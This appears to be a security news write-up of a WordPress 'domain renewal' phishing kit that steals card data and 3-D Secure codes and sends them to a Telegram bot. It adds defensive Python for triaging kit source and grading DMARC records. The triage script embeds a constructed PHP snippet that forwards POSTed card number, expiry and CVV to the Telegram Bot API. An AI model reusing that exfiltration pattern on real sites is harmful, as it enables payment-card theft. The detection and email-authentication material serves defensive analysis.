A sophisticated new phishing campaign is targeting WordPress site owners with fake “domain renewal” notices, tricking victims into handing over credit card details and 3-D Secure OTPs. Threat researcher Anurag has uncovered the operation, which avoids a dedicated command-and-control server altogether by exfiltrating stolen data straight to the attackers through a Telegram bot.
The scam begins with an email bearing the subject line “Renewal due soon – Action required.” While the message creates a sense of panic, Anurag’s analysis highlights a critical error: “A critical red flag in this email is the absence of any specific domain name, which is highly unusual for a legitimate renewal notice”.
Victims who click the “Renew Now” button are redirected to a fraudulent payment page hosted on soyfix[.]com. The site is a near-perfect replica of a legitimate WordPress checkout flow.
“The phishing page is carefully designed to visually mimic a legitimate WordPress checkout flow, creating a false sense of trust for the victim,” Anurag notes. It features a “Secure order validation” banner, branded credit card logos, and a realistic pricing breakdown (e.g., $13.00 subtotal, $2.73 VAT).
However, the “order” is fake. The page logic collects the victim’s Cardholder Name, Card Number, Expiry Date, and CVV, transmitting them immediately to the attacker.
In a devious twist, the attackers don’t just steal the card; they attempt to bypass 3-D Secure protections. After the card details are submitted, the site displays a fake “3D Secure Verification” modal, prompting the victim to enter an SMS code.
The script then engages in “psychological trust mechanisms,” such as a 7-second loading screen and a 4-second “verification processing” delay, to make the theft appear like a genuine banking transaction.
Crucially, the page is programmed to fail. “The page always returns ‘Verification failed’, forcing victims to re-enter OTPs, allowing attackers to harvest multiple valid codes”.
The campaign’s infrastructure is notable for its reliance on legitimate messaging apps. Instead of sending data to a suspicious server, the backend scripts (send_payment.php and send_sms.php) forward the stolen credentials to a Telegram bot.
“Despite the generic filename, console messages and code comments explicitly state the data is forwarded to Telegram, indicating the attacker is using a Telegram bot/channel as a Command & Control (C2) exfiltration mechanism”.
This method is increasingly popular because it “incurs minimal infrastructure costs” and is “significantly harder to disrupt or take down compared to conventional hosted C2 panels”.
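Because the kit's backend scripts are plain PHP, the fastest way to confirm Telegram exfiltration once a copy of the page is in hand is static triage of the source. The script below is an added example written for this article, not code from the kit or from the researcher: it scans a PHP file for the Bot API endpoint, extracts the bot token and chat ID an abuse report needs, and lists the form fields being harvested. The PHP sample embedded in it is constructed to mirror the send_payment.php behaviour described above; its token and chat ID are made up.

```python
"""Static triage of a phishing-kit backend script for Telegram Bot API
exfiltration. The PHP below is a constructed stand-in written for this
example (the token and chat ID are fake), not the kit's actual source."""

import re
from typing import Dict, List

# Constructed sample modelled on the send_payment.php behaviour the article describes.
SAMPLE_PHP = r'''<?php
// forward captured card data to Telegram
$token   = "123456789:AAExampleTokenForIllustrationOnly00";
$chat_id = "-1001234567890";
$msg = "Card: " . $_POST['cc'] . " Exp: " . $_POST['exp'] . " CVV: " . $_POST['cvv'];
$url = "https://api.telegram.org/bot" . $token . "/sendMessage";
file_get_contents($url . "?chat_id=" . $chat_id . "&text=" . urlencode($msg));
echo json_encode(["status" => "ok"]);
'''

# Telegram bot tokens have the shape '<numeric bot id>:<35-character secret>'.
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# Every Bot API call goes to https://api.telegram.org/bot<token>/<method>.
API_RE = re.compile(r"api\.telegram\.org/bot")
# Destination chat/channel; negative IDs denote groups and channels.
CHAT_ID_RE = re.compile(r"chat_id\s*=\s*[\"']?(-?\d+)")
# Form fields the script reads from the victim's submission.
POST_FIELD_RE = re.compile(r"\$_(?:POST|REQUEST)\[\s*['\"](\w+)['\"]\s*\]")
# Outbound sinks that can carry the data off the host.
SINK_RE = re.compile(r"\b(file_get_contents|curl_init|curl_exec|fsockopen|mail)\s*\(")


def scan_kit_source(src: str) -> Dict[str, object]:
    """Collect indicators useful for an abuse report and for writing detections."""
    return {
        "telegram_api": bool(API_RE.search(src)),
        "bot_tokens": sorted(set(TOKEN_RE.findall(src))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(src))),
        "harvested_fields": sorted(set(POST_FIELD_RE.findall(src))),
        "sinks": sorted(set(SINK_RE.findall(src))),
    }


def is_telegram_exfil(findings: Dict[str, object]) -> bool:
    """The pattern from the article: Bot API endpoint, a token or chat target,
    and at least one captured form field feeding it."""
    return bool(
        findings["telegram_api"]
        and (findings["bot_tokens"] or findings["chat_ids"])
        and findings["harvested_fields"]
    )


def report_lines(findings: Dict[str, object]) -> List[str]:
    """Human-readable summary suitable for pasting into a takedown ticket."""
    lines = [f"Telegram Bot API referenced: {findings['telegram_api']}"]
    lines += [f"bot token: {t}" for t in findings["bot_tokens"]]
    lines += [f"chat_id: {c}" for c in findings["chat_ids"]]
    lines.append("harvested fields: " + ", ".join(findings["harvested_fields"]))
    lines.append("outbound sinks: " + ", ".join(findings["sinks"]))
    return lines


if __name__ == "__main__":
    found = scan_kit_source(SAMPLE_PHP)
    print("Telegram exfil kit:", is_telegram_exfil(found))
    print("\n".join(report_lines(found)))
```

The bot token and chat ID are the artifacts that matter for disruption: Telegram's abuse channel can act on them even when the hosting provider is slow, and the numeric prefix of the token identifies the bot account. On the network side, the same finding translates into a detection that a web server hosting a checkout page has no reason to open outbound HTTPS connections to api.telegram.org.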
The initial phishing emails were sent from admin@theyounginevitables.com, an unrelated domain that the message used to impersonate WordPress support. Analysis of the email headers revealed that the domain published a monitoring-only DMARC policy (p=none), which asks receiving mail servers to take no action on messages that fail SPF and DKIM alignment; a forged From: address under that domain is therefore delivered like any legitimate message, and the attackers could spoof the sender identity without restriction.
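To see why p=none matters, it helps to run the DMARC evaluation a receiver performs. The following is an added example written for this article, not part of the researcher's analysis: it parses a published _dmarc TXT record, grades the policy, and shows the disposition a receiver applies to a message whose SPF and DKIM identifiers do not align with the From: domain, which is the spoofing case described above. The records are constructed for illustration; the weak one mirrors the p=none posture reported here, and the strong one is the corrected form. The real record for any domain can be pulled with `dig +short TXT _dmarc.<domain>`.

```python
"""DMARC record triage: parse a _dmarc TXT record, grade its policy, and
apply the (simplified, RFC 7489) disposition a receiver would reach for a
message that fails both SPF and DKIM alignment. Records are constructed."""

from typing import Dict, List, Tuple

# Constructed records for illustration, not fetched from any real domain.
WEAK_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
STRONG_RECORD = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com"


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split 'v=DMARC1; p=none; rua=...' into a lower-cased tag=value dict."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> Tuple[str, List[str]]:
    """Return ('enforcing' | 'weak' | 'invalid', findings).

    'enforcing' requires p=quarantine or p=reject applied to 100% of mail
    with subdomains not explicitly opened up via sp=none."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return "invalid", ["record does not start with v=DMARC1"]

    findings: List[str] = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: receivers take no action on failing mail, "
                        "so a forged From: under this domain is delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append("p= tag missing or unrecognised")

    # sp= defaults to the apex policy when absent.
    subdomain_policy = tags.get("sp", policy).lower()
    if subdomain_policy == "none" and policy != "none":
        findings.append("sp=none: subdomains are unprotected although the apex enforces")

    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 0
        findings.append("pct= is not numeric")
    if 0 < pct < 100:
        findings.append(f"pct={pct}: policy applied to only {pct}% of failing mail")

    if "rua" not in tags:
        # Advisory only: reporting does not change enforcement.
        findings.append("no rua= address: owner receives no aggregate reports of spoofing")

    enforcing = (policy in ("quarantine", "reject")
                 and pct == 100
                 and subdomain_policy != "none")
    return ("enforcing" if enforcing else "weak"), findings


def dmarc_disposition(record: str, spf_aligned: bool, dkim_aligned: bool) -> str:
    """DMARC passes if either SPF or DKIM authenticates an identifier aligned
    with the From: domain; otherwise the published p= policy decides.
    (pct sampling is ignored here for clarity.)"""
    if spf_aligned or dkim_aligned:
        return "pass"
    policy = parse_dmarc(record).get("p", "none").lower()
    return {"reject": "reject", "quarantine": "quarantine"}.get(policy, "deliver")


if __name__ == "__main__":
    for name, rec in (("weak", WEAK_RECORD), ("strong", STRONG_RECORD)):
        verdict, findings = assess_dmarc(rec)
        print(f"{name}: {verdict}")
        for line in findings:
            print("  -", line)
        # A third party forging the From: header has no aligned SPF or DKIM.
        print("  forged From: ->", dmarc_disposition(rec, False, False))
```

The deliver-versus-reject outcome for the forged message is the whole story of L13: with p=none the receiver has verified that the message is not from the domain and delivers it anyway. Moving to p=quarantine, then p=reject, once aggregate reports show legitimate senders are aligned, is the fix for the domain owner; for everyone else, the lesson is that a passing-looking sender address proves nothing about a domain that has not opted into enforcement.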
WordPress users are advised to be skeptical of any renewal notice that does not specify the domain name in question and to verify their account status directly through the official WordPress.com dashboard, reached by typing the address themselves rather than by following a link in the message.